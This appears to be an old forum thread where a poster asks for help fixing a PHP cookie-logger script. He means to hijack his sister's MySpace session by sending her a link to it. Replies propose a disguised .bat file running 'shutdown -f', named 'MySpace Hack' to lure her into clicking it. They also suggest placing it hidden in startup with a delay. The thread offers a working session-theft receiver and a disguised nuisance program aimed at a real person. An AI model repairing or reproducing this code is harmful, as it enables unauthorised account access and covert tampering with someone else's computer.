Cookie Theif

Garethp

I want to play a prank on my sister, seeing as how she just spiked my  coffee with Peri Peri Sauce, so I want to make a cookie stealer to get her session and use it to get into her myspace. Can I do that? This is what I have so far for the cookie steal script, I'll just send her a link to the page

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>

But when I test it on myself, it says Undefined index cookie. Even when I set $HTTP_GET_VARS["cookie"]; to $HTTP_GET_VARS["MSSession"];, which is a cookie name that I know I have, it still says undefined index. Can you help me?

Just open notepad.

Type in

shutdown -f
and save it as a .bat file. Then rename it something like MySpace Hack. Being curious, she'll more than likely click on it.

Oh, and be honest. You're just wanting to steal cookies.

best way to do that actually is to have a time out so after "x" seconds/minutes the computer just shuts down, start it up in the start menu or hidden she'll never figure it out ;)

This thread is more than a year old. Please don't revive it unless you have something important to add.